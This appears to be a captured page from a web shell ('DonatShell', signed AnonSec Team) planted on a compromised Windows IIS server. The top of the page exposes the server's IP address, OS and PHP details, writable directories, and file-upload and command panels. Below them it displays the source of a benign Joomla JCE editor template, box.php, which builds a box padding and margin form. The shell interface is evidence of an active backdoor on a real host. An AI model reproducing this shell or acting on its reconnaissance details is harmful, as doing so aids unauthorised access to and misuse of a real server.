DonatShell
Server IP : 180.180.241.3  /  Your IP : 216.73.216.252
Web Server : Microsoft-IIS/7.5
System : Windows NT NETWORK-NHRC 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586
User : IUSR ( 0)
PHP Version : 5.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /AppServ/www/news/components/com_jce/editor/tiny_mce/plugins/style/tmpl/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /AppServ/www/news/components/com_jce/editor/tiny_mce/plugins/style/tmpl/box.php
<?php

/**
 * @package   	JCE
 * @copyright 	Copyright (c) 2009-2013 Ryan Demmer. All rights reserved.
 * @license   	GNU/GPL 2 or later - http://www.gnu.org/licenses/old-licenses/gpl-2.0.html
 * JCE is free software. This version may have been modified pursuant
 * to the GNU General Public License, and as distributed it includes or
 * is derivative of works licensed under the GNU General Public License or
 * other free or open source software licenses.
 */

defined('_JEXEC') or die('RESTRICTED');
?>
<table border="0">
    <tr>
      <td><label for="box_width"><?php echo WFText::_('WF_STYLES_BOX_WIDTH');?></label></td>
      <td>
        <table border="0" cellspacing="0" cellpadding="0">
          <tr>
            <td><input type="text" id="box_width" name="box_width" class="mceEditableSelect" onchange="StyleDialog.synch('box_width','positioning_width');" /></td>
            <td>&nbsp;</td>
            <td><select id="box_width_measurement" name="box_width_measurement"></select></td>
          </tr>
        </table>
      </td>
      <td>&nbsp;&nbsp;&nbsp;<label for="box_float"><?php echo WFText::_('WF_STYLES_BOX_FLOAT');?></label></td>
      <td><select id="box_float" name="box_float" class="mceEditableSelect"></select></td>
    </tr>
  
    <tr>
      <td><label for="box_height"><?php echo WFText::_('WF_STYLES_BOX_HEIGHT');?></label></td>
      <td>
        <table border="0" cellspacing="0" cellpadding="0">
          <tr>
            <td><input type="text" id="box_height" name="box_height" class="mceEditableSelect" onchange="StyleDialog.synch('box_height','positioning_height');" /></td>
            <td>&nbsp;</td>
            <td><select id="box_height_measurement" name="box_height_measurement"></select></td>
          </tr>
        </table>
      </td>
      <td>&nbsp;&nbsp;&nbsp;<label for="box_clear"><?php echo WFText::_('WF_STYLES_BOX_CLEAR');?></label></td>
      <td><select id="box_clear" name="box_clear" class="mceEditableSelect"></select></td>
    </tr>
  </table>
  <div style="float: left; width: 49%">
    <fieldset>
      <legend><?php echo WFText::_('WF_STYLES_PADDING');?></legend>
  
      <table border="0">
        <tr>
          <td>&nbsp;</td>
          <td><input type="checkbox" id="box_padding_same" name="box_padding_same" class="checkbox" checked="checked" onclick="StyleDialog.toggleSame(this,'box_padding');" /> <label for="box_padding_same"><?php echo WFText::_('WF_STYLES_SAME');?></label></td>
        </tr>
        <tr>
          <td><label for="box_padding_top"><?php echo WFText::_('WF_STYLES_TOP');?></label></td>
          <td>
            <table border="0" cellspacing="0" cellpadding="0">
              <tr>
                <td><input type="text" id="box_padding_top" name="box_padding_top" class="mceEditableSelect" /></td>
                <td>&nbsp;</td>
                <td><select id="box_padding_top_measurement" name="box_padding_top_measurement"></select></td>
              </tr>
            </table>
          </td>
        </tr>
        <tr>
          <td><label for="box_padding_right"><?php echo WFText::_('WF_STYLES_RIGHT');?></label></td>
          <td>
            <table border="0" cellspacing="0" cellpadding="0">
              <tr>
                <td><input type="text" id="box_padding_right" name="box_padding_right" class="mceEditableSelect" disabled="disabled" /></td>
                <td>&nbsp;</td>
                <td><select id="box_padding_right_measurement" name="box_padding_right_measurement" disabled="disabled"></select></td>
              </tr>
            </table>
          </td>
        </tr>
        <tr>
          <td><label for="box_padding_bottom"><?php echo WFText::_('WF_STYLES_BOTTOM');?></label></td>
          <td>
            <table border="0" cellspacing="0" cellpadding="0">
              <tr>
                <td><input type="text" id="box_padding_bottom" name="box_padding_bottom" class="mceEditableSelect" disabled="disabled" /></td>
                <td>&nbsp;</td>
                <td><select id="box_padding_bottom_measurement" name="box_padding_bottom_measurement" disabled="disabled"></select></td>
              </tr>
            </table>
          </td>
        </tr>
        <tr>
          <td><label for="box_padding_left"><?php echo WFText::_('WF_STYLES_LEFT');?></label></td>
          <td>
            <table border="0" cellspacing="0" cellpadding="0">
              <tr>
                <td><input type="text" id="box_padding_left" name="box_padding_left" class="mceEditableSelect" disabled="disabled" /></td>
                <td>&nbsp;</td>
                <td><select id="box_padding_left_measurement" name="box_padding_left_measurement" disabled="disabled"></select></td>
              </tr>
            </table>
          </td>
        </tr>
      </table>
    </fieldset>
   </div>
   <div style="float: right; width: 49%">
    <fieldset>
      <legend><?php echo WFText::_('WF_STYLES_MARGIN');?></legend>
  
      <table border="0">
        <tr>
          <td>&nbsp;</td>
          <td><input type="checkbox" id="box_margin_same" name="box_margin_same" class="checkbox" checked="checked" onclick="StyleDialog.toggleSame(this,'box_margin');" /> <label for="box_margin_same"><?php echo WFText::_('WF_STYLES_SAME');?></label></td>
        </tr>
        <tr>
          <td><label for="box_margin_top"><?php echo WFText::_('WF_STYLES_TOP');?></label></td>
          <td>
            <table border="0" cellspacing="0" cellpadding="0">
              <tr>
                <td><input type="text" id="box_margin_top" name="box_margin_top" class="mceEditableSelect" /></td>
                <td>&nbsp;</td>
                <td><select id="box_margin_top_measurement" name="box_margin_top_measurement"></select></td>
              </tr>
            </table>
          </td>
        </tr>
        <tr>
          <td><label for="box_margin_right"><?php echo WFText::_('WF_STYLES_RIGHT');?></label></td>
          <td>
            <table border="0" cellspacing="0" cellpadding="0">
              <tr>
                <td><input type="text" id="box_margin_right" name="box_margin_right" class="mceEditableSelect" disabled="disabled" /></td>
                <td>&nbsp;</td>
                <td><select id="box_margin_right_measurement" name="box_margin_right_measurement" disabled="disabled"></select></td>
              </tr>
            </table>
          </td>
        </tr>
        <tr>
          <td><label for="box_margin_bottom"><?php echo WFText::_('WF_STYLES_BOTTOM');?></label></td>
          <td>
            <table border="0" cellspacing="0" cellpadding="0">
              <tr>
                <td><input type="text" id="box_margin_bottom" name="box_margin_bottom" class="mceEditableSelect" disabled="disabled" /></td>
                <td>&nbsp;</td>
                <td><select id="box_margin_bottom_measurement" name="box_margin_bottom_measurement" disabled="disabled"></select></td>
              </tr>
            </table>
          </td>
        </tr>
        <tr>
          <td><label for="box_margin_left"><?php echo WFText::_('WF_STYLES_LEFT');?></label></td>
          <td>
            <table border="0" cellspacing="0" cellpadding="0">
              <tr>
                <td><input type="text" id="box_margin_left" name="box_margin_left" class="mceEditableSelect" disabled="disabled" /></td>
                <td>&nbsp;</td>
                <td><select id="box_margin_left_measurement" name="box_margin_left_measurement" disabled="disabled"></select></td>
              </tr>
            </table>
          </td>
        </tr>
      </table>
    </fieldset>
  </div>

Anon7 - 2022
AnonSec Team